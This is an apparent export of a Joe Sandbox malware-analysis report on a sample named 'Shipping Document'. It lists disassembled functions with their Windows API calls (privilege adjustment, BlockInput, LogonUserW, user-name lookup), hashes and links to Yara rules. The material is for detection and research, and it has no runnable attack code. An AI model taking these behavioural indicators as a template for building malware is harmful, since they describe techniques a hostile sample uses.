API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 63786eeb24ba6042bc4f869ee99f1e54509c31de85d9c64c0a5617903cdeb824
Instruction ID: bfd208df7a634348a006ba66b23d9460a964fadaeb38642e1589d0a2d53e02e0
Opcode Fuzzy Hash: 63786eeb24ba6042bc4f869ee99f1e54509c31de85d9c64c0a5617903cdeb824
Instruction Fuzzy Hash: B8117CB1D00239BEE7209AECDC84FAFBBBCEB08610F000656FA44E7181C2B9594487A1

Function 01024C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01024C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 01024C43
FreeSid.ADVAPI32(?), ref: 01024C53

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: ffa8cfe6bbd20d0c91a92372532dcf7b5967a96dd7e05e436f935a25ce6f5ae5
Instruction ID: a1b0f4fcd513d41c1f68377624c3015b73edb64253f0d9ff37d01260e1757e2b
Opcode Fuzzy Hash: ffa8cfe6bbd20d0c91a92372532dcf7b5967a96dd7e05e436f935a25ce6f5ae5
Instruction Fuzzy Hash: 09F04F7591130DBFDF14DFF4D989AAEBBBCEF08201F5044A9A501E2180D6756A048B50

Function 00FCE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e9154e0abc5c7c91aa557e1e944423e9461b5ae10aaf95f0fbec6898406e1d6
Instruction ID: dd51dfcd61b2fca17bc32c948e80d40c6eeec90229df8f61c43261cef8826180
Opcode Fuzzy Hash: 9e9154e0abc5c7c91aa557e1e944423e9461b5ae10aaf95f0fbec6898406e1d6
Instruction Fuzzy Hash: 1A22AD75E00216CFDB24DF58C682BAABBB0FF04310F14846DE9969B381D735A985EB91

Function 01024F21 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 01024F55

Strings

DOWN, xrefs: 01024F3A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 88bbd8902e5fa89b9fda8dd0d1e4af77c0054c08023beb91385a65d191e85fca
Instruction ID: 1f014c770f08fdc9cab9f959315ed8c185247ca3a4ed43ac93b13e6c385a40f5
Opcode Fuzzy Hash: 88bbd8902e5fa89b9fda8dd0d1e4af77c0054c08023beb91385a65d191e85fca
Instruction Fuzzy Hash: 47E0CD7555C7B23CB99425197C0FEF713CC8B52131F11028AF990D50C1ED992C8215FC

Function 0102C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0102C966
FindClose.KERNEL32(00000000), ref: 0102C996

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 67155c26f9ed0075b050eaa3cd3876e890c3927671875a965440b7338ba93f84
Instruction ID: 1f45282fd0ea2f80dc9cc3b2f6e7eab774d90da47bcc0048eace0ce2b81707d4
Opcode Fuzzy Hash: 67155c26f9ed0075b050eaa3cd3876e890c3927671875a965440b7338ba93f84
Instruction Fuzzy Hash: D9118E766046119FD710EF29D949A2AF7E9EF84324F00851EF8A9C7291DB78AC00CB81

Function 0102A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0103977D,?,0104FB84,?), ref: 0102A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0103977D,?,0104FB84,?), ref: 0102A314

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ca9420f4a99797674ea6f41933d8bc993e2c81d4fb69159c02159e0a1a8d8d9a
Instruction ID: f0804ff3c79286de3a0bdc51ba6936777327e160e4453cb8ce82ed3ffd2198db
Opcode Fuzzy Hash: ca9420f4a99797674ea6f41933d8bc993e2c81d4fb69159c02159e0a1a8d8d9a
Instruction Fuzzy Hash: 45F0893554422DE7D721AEA4CC49FEA776DBF08751F008155F948D7141DA749544CBE0

Function 01018713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01018851), ref: 01018728
CloseHandle.KERNEL32(?,?,01018851), ref: 0101873A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: ed9fd980ddadf9e24a054e73bcf359f05cc132cd3d8af9035c05b186c7e61e6e
Instruction ID: 9dfc3e782e16a8657f64e9e64431520e6eaafbd23fa0d38e975d88bc693af7a1
Opcode Fuzzy Hash: ed9fd980ddadf9e24a054e73bcf359f05cc132cd3d8af9035c05b186c7e61e6e
Instruction Fuzzy Hash: 06E04676000641EFE7712B26ED08D73BBE9FB003507108829B99680834CB36AC90EB10

Function 00FEA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FE8F97,?,?,?,00000001), ref: 00FEA39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FEA3A3

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b23b5e83bd0310d7bf37c586638e2c19fa78cace12fccb80073330dbeaeef515
Instruction ID: bb07037f817804cbf8aa4bb7de2f176aa55bf24a310ff98fa8e38a3ff17c59e7
Opcode Fuzzy Hash: b23b5e83bd0310d7bf37c586638e2c19fa78cace12fccb80073330dbeaeef515
Instruction Fuzzy Hash: 16B092F505420AABCA102B99E949F883F68EB44AA3F408010F64D84054CBE754508B91

Function 00FEF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41c7f0d9b6f76d7cea05d41e13b6d5fbedc3f81df51fd5c028b973f7e4c003a1
Instruction ID: c070a543e200d800b647d187868b197cd5f5db5df32a1f6975a7201d8b7f9c9b
Opcode Fuzzy Hash: 41c7f0d9b6f76d7cea05d41e13b6d5fbedc3f81df51fd5c028b973f7e4c003a1
Instruction Fuzzy Hash: BA323632D29F414DE7239535D832336B248AFB73D4F64D737E819B5A9AEB29C4836200

Function 00FF267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d08bb0a4fcaf705f49e1e5cf49fc60980ce96e5a6b9f2d4c1b8fe4ad51e898dd
Instruction ID: 0d2737b424c3f3b8bf0c082180b596ff412e1c33ab66e4382d2bfe6ce1c45cbb
Opcode Fuzzy Hash: d08bb0a4fcaf705f49e1e5cf49fc60980ce96e5a6b9f2d4c1b8fe4ad51e898dd
Instruction Fuzzy Hash: E4B1E030E2AF418DD72396398831337BA4CAFBB2C9B51D71BFC5675D26EB2685834240

Function 01028B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 01028B25

Part of subcall function 00FE543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,010291F8,00000000,?,?,?,?,010293A9,00000000,?), ref: 00FE5443
Part of subcall function 00FE543A: __aulldiv.LIBCMT ref: 00FE5463

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: c55a76a3161fe8746c6200d2aa0a72f8f566fb2d1cdf1c5484c00a0bd3c438f1
Instruction ID: e6a5a543d70d21fd211ca2fa6a2d4479b1064ad8fde73c499f1e510e5a020b80
Opcode Fuzzy Hash: c55a76a3161fe8746c6200d2aa0a72f8f566fb2d1cdf1c5484c00a0bd3c438f1
Instruction Fuzzy Hash: A121E4726355108BC72ACF29D441B52B3E1EBA5311B288E6CD0F5CB2C0CA75B905CB94

Function 010341FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 01034218

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 8dc4da7184afaffe59b3542d5898895be3ce23dc97edade2c5d45a974bba17ba
Instruction ID: 057f6bbf6f902cd9315162ad3a929c0d6feca6a0c073851e24507fb2fc40c282
Opcode Fuzzy Hash: 8dc4da7184afaffe59b3542d5898895be3ce23dc97edade2c5d45a974bba17ba
Instruction Fuzzy Hash: 5DE048752441159FC710DF59D945E5AF7DCAF94760F018019FC49DB352DAB4E8408B90

Function 01018C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,010188D1), ref: 01018CB3

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 516746485f31bde0765aec4314f03c09abeaaae3c4585bd144a212a6ce0d9265
Instruction ID: 95a0c2074e34b002979582194e31d00a2a9b2ca88fd0ea86fc0e8266788f9588
Opcode Fuzzy Hash: 516746485f31bde0765aec4314f03c09abeaaae3c4585bd144a212a6ce0d9265
Instruction Fuzzy Hash: 3BD05E3226050EBBEF018EA8DD01EAF3B69EB04B01F408111FE15C5090C776D835AF60

Function 01002230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 01002242

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: ede4b890b138d629c709b3c38883c5fbfb9b19ea10fe06ac8a5f7046cb88eba4
Instruction ID: f27273387535e839688edfc06459c46e087e07f49f4bd9144a6b12bc36de1914
Opcode Fuzzy Hash: ede4b890b138d629c709b3c38883c5fbfb9b19ea10fe06ac8a5f7046cb88eba4
Instruction Fuzzy Hash: 45C04CF5800109DBDB15DB90D688DEE77BCAB04304F104055A141F2140D7749B448B71

Function 00FEA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FEA36A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a1113394a7a91d3e62b39f446db0b4db96821a2d18792700748f43ce13ab6d97
Instruction ID: e2acddabd37b928522f9286b3b6c77d078014bc10b01becd397146ab4cd442f0
Opcode Fuzzy Hash: a1113394a7a91d3e62b39f446db0b4db96821a2d18792700748f43ce13ab6d97
Instruction Fuzzy Hash: D4A012B000010DA78A001A45E8048447F5CD6005917008010F40C4001187B354104680

Function 00FD8A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f2d2eb0a29e12bd6fb37aebf3666dce712a56d3389c50b0a18be9d13c622cc
Instruction ID: e64dadec69773dfd6c773c92505e3ba71bcf09e28e54a2cc95ef4aa78e124236
Opcode Fuzzy Hash: f6f2d2eb0a29e12bd6fb37aebf3666dce712a56d3389c50b0a18be9d13c622cc
Instruction Fuzzy Hash: BB224B31911116CBDF388F19D89467D77A2FB82394F2C846BD8829F395DB389D82DB60

Function 00FE2405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: b08c72a7b92294e1b79326385b18db26e08267b162795b2396f407a8086ce651
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 76C190326051D309DF6D863B943413EBAE56AA27B131A0B6EE4B3CB5C5FF20D564F620

Function 00FE283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 9dc724789f6c140d1813bd601d1322f2d832e42e1cc3633806d23a91e65c924a
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 50C1BF336051D30ADBAD463BD43413EBBE56AA27B131A176DE4B2CB4C5FF20D664B620

Function 00FE1BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: ba0bcffb9c1b1587216c65a119040e6ca96b6c09160500111873c45e133ecc5a
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: E9C16D326091D309DF2D463B943417EBAE17AA27B131A0B6DE8B2CB5D4EF30D564F660

Function 01037B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 01037B70
DeleteObject.GDI32(00000000), ref: 01037B82
DestroyWindow.USER32 ref: 01037B90
GetDesktopWindow.USER32 ref: 01037BAA
GetWindowRect.USER32(00000000), ref: 01037BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 01037CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 01037D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037D4A
GetClientRect.USER32(00000000,?), ref: 01037D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01037D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DD0
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DE8
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DF8
GlobalFree.KERNEL32(00000000), ref: 01037E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01052CAC,00000000), ref: 01037E2B
GlobalFree.KERNEL32(00000000), ref: 01037E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01037E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01037E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103808F

Strings

DISPLAY, xrefs: 01037EF2
, xrefs: 01038015
static, xrefs: 01037D8A, 01037EE1
AutoIt v3, xrefs: 01037D42

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

